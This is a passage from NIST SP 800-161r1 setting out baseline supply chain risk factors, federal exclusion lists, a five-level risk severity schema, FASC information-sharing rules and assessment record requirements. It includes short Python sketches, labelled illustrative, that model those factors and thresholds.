defined SCRA methodology. These factors are to be used as a guide to research, identify, and
assess risk for those SCRAs pertaining to critical sources or critical covered articles, at a
minimum. A common baseline of risk factors also helps to ensure that due diligence is
consistently conducted as part of the analysis that informs risk response decisions and actions,
whether these occur at various levels within an agency or at the federal enterprise-level.
Agencies should assess additional factors beyond the baseline factors, as deemed relevant and
appropriate to a given assessment use case.
Objectives for establishing this baseline set of factors include:
• Level-setting evaluations for sources and covered articles;
• Ensuring that the minimum necessary information is available to the FASC, when
required;
• Promoting consistency and comparability across agencies;
• Aiding the conduct of more sophisticated analyses, such as trend analysis or causal or
correlation relationships between identified indicators of risk and realized risks; and
• Establishing and maintaining a base of information sufficient to identify and understand
potential mitigation options and inform prioritization or risk response trade-off
analysis/decisions.
Table E-1 that follows includes a list of the baseline risk factors and their corresponding
definition or description. These factors are also consistent with and align to the factors included
in the FASC Final Rule.52 The right-most column includes a list of the type of information that
may be identified and found to be an indicator of risk. This list is intended to be used as a
reference aid and is not all-inclusive of the possible indicators of risk. Information that pertains
to context-based risk factors should be known by the agency and is often already documented
(e.g., in a system security plan or acquisition plan). An assessment of these use case-specific and
context-based factors helps to understand inherent risk,53 guides the identification and selection
of needed cybersecurity and SCRM controls and procurement requirements, and aids in
determining the risk tolerance threshold for a covered article associated with a given use case.
The next set of vulnerability and threat risk factors is focused on risk that may be inherited from
the covered article itself or the associated source or supply chain. Agencies will assess the
findings associated with these baseline (and any additional) factors to provide an informed
judgment about whether there are indications of threat from an adversarial threat actor, the
likelihood for compromise or harm and resultant impact, and whether the assessed risk
pertaining to a source and/or covered article is within or exceeds their acceptable risk tolerance
level.
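To support mapping these baseline factors into an agency-defined SCRA methodology and its supporting tooling, the following is a minimal sketch (in Python; the class and field names, and the example factor ID, are illustrative assumptions, not part of this publication) of how a Table E-1 factor and its indicators might be encoded:

```python
from dataclasses import dataclass, field

# Hypothetical encoding of a Table E-1 baseline risk factor; the names are
# illustrative and not prescribed by NIST SP 800-161r1.
@dataclass
class BaselineRiskFactor:
    name: str                 # e.g., "Criticality"
    category: str             # "Use-Case/Context" or "Vulnerabilities or Threats"
    guidance: str             # definition or guidance text
    indicators: list[str] = field(default_factory=list)        # non-exclusive indicators of risk
    agency_factor_ids: list[str] = field(default_factory=list)  # mapping to agency methodology

purpose = BaselineRiskFactor(
    name="Purpose",
    category="Use-Case/Context",
    guidance="Understand the requirement for the product or service and how it is used.",
    indicators=["Options available in the marketplace to fulfill need",
                "Urgency of need", "Duration of need"],
    agency_factor_ids=["AGY-CTX-01"],  # hypothetical agency-defined factor ID
)
```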
52 CFR Part 201-1.300 Evaluation of Sources and Covered Articles
53 Inherent risk, defined for this purpose, is the current risk level given the existing set of controls.
Table E-1: Baseline Risk Factors
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
Use-Case/Context (Inherent Risk)
Purpose
Understand the
requirement for product or
service and how it will be
or is being used.
• Options available in the marketplace to
fulfill need
• Urgency of need
• Duration of need
Criticality
Identify if the product,
service, or source is
deemed a critical system,
system component,
service, or supplier. Refer
to the main body and
glossary of NIST SP 800-
161, Rev. 1 for additional
guidance. Also see
Appendix F for
information regarding EO-
critical software.
• Supplier or covered article (or
component therein) performs or is
essential to (or, if compromised, could
result in harm to) a mission-critical
function, life safety, homeland security,
critical infrastructure, or national
security interest or has an
interdependency with another covered
article performing or essential to such
functions
Information and
Data
Understand and document
the type, amount, purpose,
and flow of federal
data/information used by
or accessible by the
product, service, and/or
source.
• Requirement or ability to access CUI or
classified information
• Federal information will be managed
and/or accessible for external persons or
entities other than the prime contractor
or supplier
• Product or service data inputs or outputs
can affect life safety if compromised
Reliance on the
covered article or
source
Understand and articulate
the degree to which an
agency is reliant on a
covered article and/or
source and why.
• Prevalence of use of the product or
service by the agency
• Single source of supply
• Product or service availability in the
marketplace
• Availability of (or acceptable
alternatives to) the product, service, or
source
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
239
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
User/operational
environment in
which the covered
article is used or
installed or service
performed
For products included in
systems or as a system
component, the user
environment should be
described in the System
Security Plan and/or C-
SCRM System Plan. For
labor-based services,
understand and document
relevant information about
the user environment (i.e.,
place of performance) that
may expose the agency to
risk.
• The system and/or C-SCRM Security
Plan should identify and document risks
and describe the applicable, selected
security controls implemented or
required to be implemented to mitigate
those risks
• Relevant environment considerations
that give rise to risk concerns should be
documented in procurement plans and
applicable controls addressed in
solicitations and contracts
External agency
interdependencies
Understand and identify
interdependencies related
to data, systems, and
mission functions.
• Covered article performs a function in
support of a government-wide shared
service
• Covered article exchanges data with
another agency’s mission critical
system
• Contractor maintains an analytic tool
that stores government-wide CUI data
Vulnerabilities or Threats (Inherited Risk)
Functionality,
features, and
components of the
covered article
Information informs a
determination as to
whether the product or
service is fit for purpose”
and the extent to which
there is assurance that the
applicable C-SCRM
dimensions (see Section
1.4 of main body) are
satisfied, and/or there are
inherent or unmitigated
weaknesses or
vulnerabilities.
• Ability of the source to produce and
deliver the product or service as
expected
• Built-in security features and
capabilities or lack thereof
• Who manages or has ultimate control
over security features
• Secure configuration options and
constraints
• Management and control of security
features (who, how)
• Network/internet connectivity
capability or requirements and methods
of connection
• Software and/or hardware bill of
material
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
240
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Baseline Risk
Factor
Definition or Guidance
Non-exclusive Indicators of Risk (as
applicable)
• Any transmission of information or
data (to include, if known) the
identification of the source and location
of the initiator or recipient of the
transmission) to or by a covered article
necessary for its function
Factor: Company (i.e., source) Information
Definition or Guidance: Information about the company, to include size, structure, key leadership, and its financial health.
Non-exclusive Indicators of Risk:
• Corporate family tree
• Years in business
• Merger and acquisition activity (past and present)
• Contracts with foreign governments
• Customer base and trends
• Association or previous experience by company leadership (Board or C-suite) in foreign government or military service
• Stability or high turnover or firings at senior leadership level
• Number of employees at specific location and company-wide
• Investors/investments
• Patent sales to foreign entities
• Financial metrics and trends
• Financial reports/audits
Factor: Quality/Past Performance
Definition or Guidance: Information about the ability of the source to produce and deliver covered articles as expected. This includes an understanding of the quality assurance practices associated with preventing mistakes or defects in manufactured/developed products and avoiding problems when delivering solutions or services to customers.
Non-exclusive Indicators of Risk:
• Past performance information
• Relevant customer ratings or complaints
• Recalls
• Quality metrics
• Evidence of a quality program and/or certification
Factor: Personnel
Definition or Guidance: Information about personnel affiliated with or employed by the source or an entity within the supply chain of the product or service.
Non-exclusive Indicators of Risk:
• The supplier’s program to vet its personnel, to include whether there is an insider threat program, and/or whether the supplier performs background checks and prior employment verification
• Hiring history from a foreign country or foreign adversary’s intelligence, military, law enforcement, or other security services
• Turnover rate
• Staffing level and competencies
• Evidence of questionable loyalties and unethical or illicit behavior and activities
Factor: Physical
Definition or Guidance: Information associated with the physical aspects of the environment, structures, facilities, or other assets sufficient to understand if/how they are secured and the consequences if damaged, unavailable, or compromised.
Non-exclusive Indicators of Risk:
• Evidence of the effectiveness of physical security controls, such as procedures and practices that ensure or assist in the support of physical security
• Proximity to critical infrastructure or sensitive government assets or mission functions
• Natural disasters or seismic and climate concerns
Factor: Geopolitical
Definition or Guidance: Information associated with a geographic location or region of relevance to the source or the supply chain associated with the source, product, and/or service.
Non-exclusive Indicators of Risk:
• Location-based political upheaval or corruption
• Trade route disruptions
• Jurisdictional legal requirements
• Country or regional instability
Factor: Foreign Ownership, Control, or Influence (FOCI)
Definition or Guidance: Ownership of, control of, or influence over the source or covered article(s) by a foreign interest (e.g., a foreign government or parties owned or controlled by a foreign government, or other ties between the source and a foreign government) that has the power, direct or indirect, whether or not exercised, to direct or decide matters that affect the management or operations of the company.
Non-exclusive Indicators of Risk:
• Country is identified as a foreign adversary or country of special concern
• Source or its component suppliers have headquarters, research, development, manufacturing, testing, packaging, distribution, or service facilities or other operations in a foreign country, including a country of special concern or a foreign adversary
• Identified personal and/or professional ties between the source – including its officers, directors or similar officials, employees, consultants, or contractors – and any foreign government
• Implications of laws and regulations of any foreign country in which the source has headquarters, research, development, manufacturing, testing, packaging, distribution, or service facilities or other operations
• Nature or degree of FOCI on a supplier
• FOCI of any business entities involved in the supply chain, to include subsidiaries and subcontractors, and whether that ownership or influence is from a foreign adversary of the United States or country of concern
• Any indications that the supplier may be partly or wholly acquired by a foreign entity or a foreign adversary
• Supplier domiciled in a country (without an independent judicial review) where the law mandates cooperation, to include the sharing of PII and other sensitive information, with the country’s security services
• Indications that demonstrate a foreign interest’s capability to control or influence the supplier’s operations or management or that of an entity within the supply chain
• Key management personnel in the supply chain with foreign influence from or with a connection to a foreign government official or entities, such as members of the board of directors, officers, general partners, and senior management officials
• Foreign nationals or key management personnel from a foreign country involved with the design, development, manufacture, or distribution of the covered article
• Supplier’s known connections to a foreign country or foreign adversary’s intelligence, law enforcement, or other security service
• Supplier is domiciled in or influenced/controlled by a country that is known to conduct intellectual property theft against the United States
Factor: Compliance/Legal
Definition or Guidance: Information about non-compliance, litigation, criminal acts, or other relevant legal requirements.
Non-exclusive Indicators of Risk:
• Record of compliance with pertinent U.S. laws, regulations, contracts, or agreements
• Sanctions compliance
• Trade controls compliance
• Judgments/Fines
Factor: Fraud, Corruption, Sanctions, and Alignment with Government Interests
Definition or Guidance: Information about past or present fraudulent activity or corruption and being subject to suspension, debarment, exclusion, or sanctions (also see Table E-2 and the discussion immediately preceding that table).
Non-exclusive Indicators of Risk:
• Civil or criminal litigation
• Past history or current evidence of fraudulent activity
• Source’s history of committing intellectual property theft
• Supplier’s dealings in the sale of military goods, equipment, or technology to countries that support terrorism or proliferate missile technology or chemical or biological weapons, and transactions identified by the Secretary of Defense as “posing a regional military threat” to the interests of the United States
• Source’s history regarding unauthorized technology transfers
Factor: Cybersecurity
Definition or Guidance: Information about the cybersecurity practices, vulnerabilities, or incidents of the source, product, service, and/or supply chain.
Non-exclusive Indicators of Risk:
• Evidence of effective cybersecurity policies and practices
• Supplier’s history as a victim of computer network intrusions
• Supplier’s history as a victim of intellectual property theft
• Information about whether a foreign intelligence entity unlawfully collected or attempted to acquire an acquisition item, technology, or intellectual property
• Existence of unmitigated cybersecurity vulnerabilities
• Indication of malicious activity – including subversion, exploitation, or sabotage – associated with the supplier or the covered article
• Any unauthorized transmission of information or data by a covered article to a country outside of the United States
Factor: *Counterfeit and Non-Conforming Products (include in baseline if relevant to source and/or product being assessed; if in doubt, include)
Definition or Guidance: Information about counterfeits, suspected counterfeits, gray market, or non-conforming products.
Non-exclusive Indicators of Risk:
• Evidence or history of counterfeits or non-conforming products associated with the supplier
• Suppliers’ anti-counterfeit practices and controls
• Sourcing of components from the gray market
Factor: Supply Chain Relationships, Visibility, and Controls
Definition or Guidance: Information about the supply chain associated with the source and/or covered article.
Non-exclusive Indicators of Risk:
• Evidence of effective C-SCRM and supplier relationship management practices
• Components or materials (relevant to covered article) originate from a single source in the upstream supply chain
• Reliance on a single trade route
• Provenance of the product
Information about these baseline risk factors should be generally available from open sources,
although the type, quality, and extent of information is likely to vary broadly. In some instances,
no information may be discovered or deemed to be applicable for a given factor and should be
noted accordingly. Research should be tailored toward attaining credible information of greatest
relevance to the purpose and context for which the assessment is being conducted (see discussion
about information quality in the Assessment Documentation and Records Management section
below). Because of these variables, it is neither possible nor desirable to attempt to standardize below the risk factor level.
Findings associated with these factors may reflect a mix of information about objective facts,
threats, vulnerabilities, or general “exposures” that, when assessed discretely or in aggregate,
indicate risk being possible or present. The findings may also be positive, neutral, or negative in
nature. Positive findings are indicative of the source or covered article having desired or required
assurance attributes. Negative findings indicate that there is or may be a risk that presents
concern and for which a determination needs to be made as to whether the risk is within
tolerance, requires mitigation, and/or may compel the need for information sharing with the
FASC.
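To illustrate how such findings might be captured in practice, the sketch below is illustrative only; the class and field names are assumptions, not part of this publication. It records per-factor findings with a positive/neutral/negative polarity and flags the factors whose negative findings require a risk determination.

```python
# Minimal sketch (assumed names) of per-factor finding capture.
# Factor names follow Table E-1; everything else is illustrative.
from dataclasses import dataclass, field
from enum import Enum

class Polarity(Enum):
    POSITIVE = "positive"   # desired/required assurance attributes present
    NEUTRAL = "neutral"
    NEGATIVE = "negative"   # risk is or may be present

@dataclass
class Finding:
    factor: str             # e.g., "FOCI", "Cybersecurity", "Personnel"
    summary: str
    polarity: Polarity
    source: str             # citation of the data source used

@dataclass
class FactorAssessment:
    findings: list = field(default_factory=list)

    def factors_of_concern(self):
        """Factors with one or more negative findings that require a
        tolerance/mitigation/information-sharing determination."""
        return sorted({f.factor for f in self.findings
                       if f.polarity is Polarity.NEGATIVE})

assessment = FactorAssessment()
assessment.findings.append(Finding(
    "FOCI",
    "Component supplier operates facilities in a country of special concern",
    Polarity.NEGATIVE,
    "open source corporate registry"))
print(assessment.factors_of_concern())  # ['FOCI']
```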
Caution! The existence of one or more risk indicators associated with the above factors does not
necessarily indicate whether a source, product, or service poses a viable or unacceptable risk, nor
does it indicate the severity of the risk. Care should also be taken to analyze what combination of
factors and findings may give rise to risk or, conversely, mitigate risk concerns. Uncertainty
about a risk determination may prompt the need to conduct additional due diligence research and
analysis, escalate internally or externally, or seek advice as to whether the risk is such that
mitigation is not possible.
Separate from or as part of the assessment, agencies should examine whether there are any laws
or federal restrictions that prohibit the use of certain suppliers and the acquisition or use of
certain items, services, or materials. The list below, while not inclusive of all applicable laws and
restrictions, is focused on foreign ownership and control, other types of foreign influence,
foreign adversaries, and foreign investment concerns that may pose risks to the U.S. supply
chain.
Using such suppliers or acquiring such an item, service, or material from an individual or entity on any of the lists below is a violation of law absent an exception or waiver; such suppliers and items should, therefore, be excluded from the federal procurement process. If an item has already
been obtained prior to the below prohibitions going into effect, agencies should conduct an
assessment to determine whether they are permitted to keep the prohibited items or services and,
if so, whether any adversarial threats posed by continued use can be mitigated.
1. The Specially Designated Nationals (SDN) and Blocked Persons List: The Treasury Department, Office of Foreign Assets Control (OFAC), through EO 13694 and as amended by EO 13757, provided for the designation on the Specially Designated Nationals and Blocked Persons List (SDN List) of parties determined to be responsible for, complicit in, or to have engaged in, directly or indirectly, malicious cyber-enabled activities. Any entity in which one or more blocked persons directly or indirectly holds a 50 % or greater ownership interest in the aggregate is itself considered blocked by operation of law (see the sketch following this list). U.S. persons may not engage in any dealings, directly or indirectly, with blocked persons.
2. The Sectoral Sanctions Identifications (SSI) List: The sectoral sanctions imposed on
specified persons operating in sectors of the Russian economy identified by the Secretary
of the Treasury were done under EO 13662 through Directives issued by OFAC pursuant
to its delegated authorities. The SSI List identifies individuals who operate in the sectors of
the Russian economy with whom U.S. persons are prohibited from transacting, providing financing for, or dealing in debt with a maturity of longer than 90 days.
3. The Foreign Sanctions Evaders (FSE) List: OFAC publishes a list of foreign individuals
and entities determined to have violated, attempted to violate, conspired to violate, or
caused a violation of U.S. sanctions on Syria or Iran pursuant to EO 13608. It also lists
foreign persons who have facilitated deceptive transactions for or on behalf of persons
subject to U.S. sanctions. Collectively, such individuals and companies are called “Foreign
Sanctions Evaders” or “FSEs.” Transactions by U.S. persons or within the United States
involving FSEs are prohibited.
4. The System for Award Management (SAM) Exclusions: The SAM contains the
electronic roster of debarred companies excluded from federal procurement and non‐
procurement programs throughout the U.S. Government (unless otherwise noted) and from
receiving federal contracts or certain subcontracts and from certain types of federal
financial and non-financial assistance and benefits. The SAM system combines data from
the Central Contractor Registration, Federal Register, Online Representations and
Certification Applications, and the Excluded Parties List System. It also reflects data from
the Office of the Inspector General’s exclusion list (GSA) (CFR Title 2, Part 180).
5. The List of Foreign Financial Institutions Subject to Correspondent Account
Payable-Through Account Sanctions (the “CAPTA List”): The CAPTA List replaced
the list of Foreign Financial Institutions Subject to Part 561. It includes the names of
foreign financial institutions subject to sanctions, certain prohibitions, or strict conditions
before a U.S. company may do business with them.
6. The Persons Identified as Blocked: Pursuant to 31 CFR 560 and 31 CFR 560.304,
property and persons included on this list must be blocked if they are in or come within the
possession or control of a U.S. person.
7. The BIS Unverified List: Parties listed on the Unverified List (UVL) are ineligible to
receive items subject to the Export Administration Regulations (EAR) by means of a
license exception.
8. The 2019 National Defense Authorization Act, Section 889: Unless a waiver is granted,
NDAA Section 889 prohibits the Federal Government, government contractors, and grant
and loan recipients from procuring or using certain “covered telecommunication
equipment or services” that are produced by Huawei, ZTE, Hytera, Hikvision, Dahua, and
their subsidiaries as a “substantial or essential component of any system or as critical
technology as part of any system.”
9. Any other federal restriction or law that would restrict the acquisition of goods, services, or
materials from a supplier.
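The aggregation logic behind OFAC’s “50 Percent Rule” referenced in item 1 can be sketched as follows. This is a toy illustration under stated assumptions: it handles direct stakes only, whereas real screening must also trace indirect ownership through intermediate entities and use current SDN List data.

```python
# Minimal sketch of the 50 % aggregate-ownership rule from item 1 above.
# An entity is itself considered blocked when blocked persons together
# hold a 50 % or greater ownership interest (direct stakes only here).

def is_blocked_by_aggregation(ownership: dict[str, float],
                              blocked_persons: set[str]) -> bool:
    """ownership maps owner name -> percentage stake (0-100)."""
    aggregate = sum(stake for owner, stake in ownership.items()
                    if owner in blocked_persons)
    return aggregate >= 50.0

# Example: two blocked persons hold 30 % and 25 %, i.e., 55 % in aggregate.
stakes = {"Person A": 30.0, "Person B": 25.0, "Person C": 45.0}
print(is_blocked_by_aggregation(stakes, {"Person A", "Person B"}))  # True
```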
Risk Severity Schema
A common framework is needed as a reference to aid agencies in determining an appropriate risk
response to the results of an SCRA. This schema indicates whether an identified risk associated
with a given source or covered article can be managed within agency-established C-SCRM
processes or requires internal or external escalation for a risk-response decision or action.
There is benefit in adopting and tailoring an existing government-wide severity schema as this
creates a degree of alignment and consistency with other related processes and guidance that are
already in use. The Supply Chain Risk Severity Schema (SCRSS) introduced and described
below mirrors the intent and structure of the Cyber Incident Severity Schema (CISS), which was
developed in coordination with departments and agencies with a cybersecurity or cyber
operations mission.
Similar to the CISS but focused on and tailored to supply chain risks versus cyber incidents, the
SCRSS is intended to ensure a common view of:
• The severity of assessed supply chain risk associated with a given source or covered article,
• The urgency required for risk response,
• The seniority level necessary for coordinating or making a risk response decision, and
• The information, documentation, and processes required to inform and support risk response efforts.
Table E-2: Risk Severity Schema

Level 5 – Urgent National Security Interest Risk: Adversarial-related risk with imminent or present impact to national security interests
Level 4 – National Security Interest Risk: Adversarial-related risk with potential to impact national security interests
Level 3 – Significant Risk: Adversarial-related risk with potential to impact multiple agencies
Level 2 – Agency High Risk: Non-adversarial-related “high” risk associated with an agency’s critical supplier (i.e., source), system, component, or high value asset
Level 1 – Agency Low or Moderate Risk: Assessed risk that does not meet the description for any of the other four risk levels
The schema in Table E-2 is not intended to replace existing agency-established methodologies
that describe and assign various risk levels or scores. Rather, it is to be used as a mapping
reference that associates an agency risk assessment result to the schema level that most closely
describes that result. Mapping gives agencies the flexibility they need to assess and describe risk
levels in a manner applicable to their purpose and context while also creating a normalized
lexicon to commonly describe supply chain risk severity across the federal enterprise. This schema
framework also helps to communicate expectations about risk response coordination,
information sharing, and decision-making responsibilities associated with each level.
Risk Response Guidance
Depending on the SCRSS level of an assessed supply chain risk, agencies may need to escalate
and share SCRA information with others within their internal organization for further research,
analysis, or risk response decisions or engage with external officials, such as the FASC.
Information Sharing
Supply chain risks assessed at Levels 3 and above are characterized as “substantial risk,” per the FASC rule, and require mandatory information sharing with the FASC via the Information Sharing Agency [54] (ISA) for subsequent review and potential additional analysis and action. At their discretion, agencies may choose to voluntarily share information concerning identified Level 2 or Level 1 risks with the FASC, in accordance with FASC information-sharing processes and requirements.
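To make the mapping and sharing thresholds concrete, the following is a minimal, illustrative sketch (not part of this publication; the function and parameter names are assumptions) that approximates assignment of a Table E-2 SCRSS level and applies the Level 3-and-above mandatory-sharing rule described above. Agencies’ own assessment methodologies govern the actual determination.

```python
# Rough approximation of mapping an agency assessment onto Table E-2 and
# deriving the FASC sharing obligation. Illustrative only.

def scrss_level(adversarial: bool, national_security_impact: str,
                multi_agency_impact: bool, agency_risk: str) -> int:
    """national_security_impact: 'imminent', 'potential', or 'none'.
    agency_risk: the agency's own rating, e.g., 'high', 'moderate', 'low'."""
    if adversarial:
        if national_security_impact == "imminent":
            return 5
        if national_security_impact == "potential":
            return 4
        if multi_agency_impact:
            return 3
    return 2 if agency_risk == "high" else 1

level = scrss_level(adversarial=True, national_security_impact="none",
                    multi_agency_impact=True, agency_risk="high")
mandatory_fasc_sharing = level >= 3  # Levels 3+ are "substantial risk"
print(level, mandatory_fasc_sharing)  # 3 True
```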
SCRI that is identified or received outside of an assessment process may also compel the need
for mandatory or voluntary sharing with the FASC or another government organization, such as
the FBI, FCC, or DHS CISA. Examples of such information include but are not limited to
information about a supply chain event, supply chain incident, information obtained from an
investigatory organization (e.g., the Office of Inspector General), or an anonymous tip received
through an agency hotline.
All information sharing that occurs between an agency and the FASC, whether mandatory or
voluntary, is to be done in accordance with FASC-established information sharing requirements
and processes consistent with the authorizing statute and regulations. Additionally, agencies
should designate a senior agency official to be the liaison for sharing information with the FASC.
Agencies should establish processes for sharing (sending and receiving) information between the
agency and the FASC and establish commensurate requirements and processes tailored to their
organization for sharing SCRI within their own organization.
Note: The FASC may issue updated or additional guidance concerning the circumstances and
criteria for mandatory and voluntary information sharing. Agencies should refer to and follow
the most current FASC guidance.
Risk Response Escalation and Triaging
Agencies are reminded of the importance of integrating SCRM into enterprise risk management
activities and governance, as covered extensively in the main body and appendices of NIST SP
800-161, Rev. 1. For risk that is determined to be at a SCRSS substantial level, it is necessary to
escalate the risk assessment information to applicable senior level officials within the agency,
including legal counsel. Agencies should also ensure that appropriate officials have sufficient
security clearances to allow them to access classified information, as needed and appropriate, to
inform or support risk response coordination, decisions, or actions.
Because a risk deemed to be substantial is adversarial in nature, there may also be law enforcement or counterintelligence equities, legal implications, or existing activities that need to be considered prior to responding to the assessed risk or engaging or communicating with the
source. Agencies’ sharing of substantial risk information with the FASC standardizes and
streamlines the process that agencies should follow to ensure these risks are “triaged”
appropriately.
[54] The Department of Homeland Security (DHS), acting primarily through the Cybersecurity and Infrastructure Security Agency, has been designated to serve as the FASC’s ISA. The ISA performs administrative information sharing functions on behalf of the FASC, as provided at 41 U.S.C. 1323(a)(3).
ASSESSMENT DOCUMENTATION AND RECORDS MANAGEMENT
Content Documentation Guidance
Agencies need to ensure that their assessment record satisfies the minimal documentation requirements described in this section for the mandatory sharing of information about sources and/or covered articles with the FASC or when escalating internally for risk-response decisions that may implicate the use of an agency’s Section 4713 authority. This documentation baseline standard helps to ensure that a robust and defensible record is or can be established to support well-informed risk response decisions and actions. It also helps to promote consistency in the scope and organization of documented content to facilitate comparability, re-usability, and information sharing.
The documentation requirements extend beyond capturing risk factor assessment information. They include general facts about who conducted the assessment and when, identifier and descriptive information about the source and covered article, citations of the data sources used to attain assessment information, an assignment of a confidence level to discrete findings and to the aggregate analysis of findings, and notes on assumptions and constraints.
Agencies should also have and follow a defined assessment and risk determination methodology.
This methodology should be documented or referenced in the assessment record concerning a
given source and/or covered article. Any deviations from the agency-defined methodology
should be described in the general information section of the assessment record.
As information is researched and compiled, it needs to be organized and synthesized to cull out and document relevant findings that align with the varying risk factor categories. Sourced information (including contextual metadata), especially notable findings of risk of concern, should be retained or retrievable in a form that preserves its informational integrity and should be treated as supplemental content that may be required to support and defend a risk response decision or action. As such, the sources for, the quality of, and the confidence in the sourced information need to be considered as part of the assessment activity and documented accordingly. Broadly, quality information should be timely, relevant, unbiased, sufficiently complete or provided in context, and attained from credible sources.
Documentation requirements should be incorporated into existing, relevant supply chain risk
assessment policies, processes, and procedures. These requirements should be informed by
consultation with and direction from officials within the agency, to include legal counsel and
personnel with responsibilities for records management, CUI and classified information
management, and privacy.
While a format is not specified, the minimal scope of content and documentation for a given
assessment record should include the content described in Table E-3 below:
Table E-3: Assessment Record – Minimal Scope of Content and Documentation

• Agency responsible for the assessment – Agencies should be able to identify points of contact and retain information about any non-federal personnel who supported the assessment, tools, and/or data sources (inclusive of commercially obtained) used in support of the assessment.
• Date of assessment or time frame in which the assessment was conducted – Agencies should note which of their findings are temporal in nature and subject to change over time.
• Source profile: identifier and descriptive information about the assessed supplier – Document (as knowable and applicable) the supplier’s legal name, DBA name, domicile, physical address, and (if different) the physical location of HQ; DUNS number and CAGE Code; contact phone number; registration as a foreign or domestic company; company website URL; company family tree structure and location in the company family tree (if known); company size; years in business; and market segment.
• Identifier and descriptive information about the assessed covered article – Document the product name, unique identifier (e.g., model number, version number, serial number), relevant NAICS and PSC, and a brief description.
• Summary of purpose and context of assessment – Identify the applicable life cycle phase indicated when the assessment occurred (e.g., market research, procurement action, operational use).
• Assessment methodology – Reference the documented methodology, and describe any deviations from it.
• Source or covered article research, findings, and risk assessment results – Document the analysis of findings, identification, and assessment of risk. Minimally, there should be a summation of the key findings, an analysis of those findings, and a rationale for the risk level determination. This summary should address potential or existing threats (whether and why they are assessed as adversarial, non-adversarial, or indeterminate in nature) or vulnerabilities of the source, covered article, and the associated supply chain. Include notes about relevant assumptions and constraints.
• Impact assessment – Relative to the purpose and context of the assessment, describe the assessed potential for impact given the type, scope, and severity of the identified risk.
• Mitigation of unresolved or unacceptable risks – Include a discussion of the capability, capacity, and willingness of the source to mitigate risks to a satisfactory level and/or the capability and capacity of the agency to mitigate risks. Identify viable mitigation options, if known, to address any unresolved or unacceptable risks.
• Assessment of risk severity level in accordance with the supply chain risk severity schema – Include the SCRSS level number and an explanation for why this level was assigned. Address identified implications for government missions or assets, national security, homeland security, or critical functions associated with use of the source or covered article.
• Risk response – Describe risk response decisions or actions taken (e.g., avoid, mitigate, escalate to FASC for coordination and triaging).
• Any other information, as specified and directed by the FASC or included per agency discretion – Describe or provide information that would factor into an assessment of supply chain risk, including any impact to agency functions and other information as the FASC deems appropriate.
• Review and clearance – Ensure that the credibility of and confidence in the sources and available information used for the risk assessment – associated with proceeding, using alternatives, and/or enacting mitigation efforts – are addressed. Confirm that the assessment record was reviewed and cleared by applicable officials, to include applicable senior leadership and legal counsel, for risk assessed as being substantial. Review and clearance are also intended to ensure that the assessment record and supporting information are appropriately safeguarded, marked, and access-controlled.
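As an illustration of how the Table E-3 content might be captured in a structured form, the sketch below models the minimal assessment record as a data class. The field names are assumptions; agency templates and records management requirements govern the real artifact.

```python
# Minimal sketch (assumed field names) covering the Table E-3 scope.
from dataclasses import dataclass, field

@dataclass
class AssessmentRecord:
    agency: str                      # responsible agency and points of contact
    assessment_date: str             # date or time frame of the assessment
    source_profile: dict             # legal/DBA name, domicile, DUNS, CAGE, ...
    covered_article: dict            # product name, model/version/serial, NAICS/PSC
    purpose_and_context: str         # life cycle phase (market research, procurement, use)
    methodology: str                 # reference to documented methodology + deviations
    findings_and_risk: str           # key findings, analysis, risk-level rationale
    impact_assessment: str           # type, scope, and severity of identified risk
    mitigations: str                 # unresolved/unacceptable risks and viable options
    scrss_level: int                 # Table E-2 level plus explanation
    risk_response: str               # avoid, mitigate, escalate to FASC, etc.
    other_fasc_information: str = ""
    reviewed_and_cleared_by: list = field(default_factory=list)
```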
Assessment Record
Agencies should ensure that records management requirements are adhered to with regard to
SCRAs and supporting artifacts. Policies and procedures should be in place that address the
requisite safeguarding, marking, handling, retention, and dissemination requirements and
restrictions associated with an assessment record and its associated content.
If and when assessment services (e.g., analytic support) or commercially-provided information
are obtained to support the development of an assessment record, an agreement (e.g., contract,
interagency agreement) should specify appropriate requirements and restrictions about scope, the
purpose of data use, and limitations, access, disposal, and retention rights.
APPENDIX F: RESPONSE TO EXECUTIVE ORDER 14028’s CALL TO PUBLISH
GUIDELINES FOR ENHANCING SOFTWARE SUPPLY CHAIN SECURITY
Departments and agencies seeking to implement Cybersecurity Supply Chain Risk Management
in accordance with Executive Order (EO) 14028, Improving the Nation’s Cybersecurity, should
reference NIST’s dedicated EO 14028 web-based portal at https://www.nist.gov/itl/executive-order-improving-nations-cybersecurity. This guidance has been moved online in order to:
• Co-locate it with related EO guidance under NIST’s purview;
• Enable updates to reflect evolving guidance without directly impacting SP 800-161, Rev.
1; and
• Provide traceability and linkage with other NIST web-based assets as they move online to
encourage dynamic and interactive engagement with stakeholders.
APPENDIX G: C-SCRM ACTIVITIES IN THE RISK MANAGEMENT PROCESS [55]
Risk management is a comprehensive process that requires enterprises to: 1) frame risk (i.e.,
establish the context for risk-based decisions), 2) assess risk, 3) respond to risk once determined,
and 4) monitor risk on an ongoing basis using effective enterprise communications and a
feedback loop for continuous improvement in the risk-related activities of enterprises. Figure G-
1 depicts interrelationships among the risk management process steps, including the order in
which each analysis may be executed and the interactions required to ensure that the analysis is
inclusive of the various inputs at the enterprise, mission, and operations levels.
Fig. G-1: Cybersecurity Supply Chain Risk Management (C-SCRM)
The steps in the risk management process (Frame, Assess, Respond, and Monitor) are iterative
and not inherently sequential in nature. Different individuals may be required to perform the
steps at the same time, depending on a particular need or situation. Enterprises have significant
flexibility in how the risk management steps are performed (e.g., sequence, degree of rigor,
formality, and thoroughness of application) and in how the results of each step are captured and
shared both internally and externally. The outputs from a particular risk management step will
directly impact one or more of the other risk management steps in the risk management process.
Figure G-2 summarizes C-SCRM activities throughout the risk management process as they are
performed within the three risk framework levels. The arrows between different steps of the risk
management process depict the simultaneous flow of information and guidance among the steps.
[55] Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Together, the arrows indicate that the inputs, activities, and outputs are continuously interacting
and influencing one another. More details are provided in the forthcoming subsections.
Fig. G-2: C-SCRM Activities in the Risk Management Process
Figure G-2 depicts interrelationships among the risk management process steps, including the
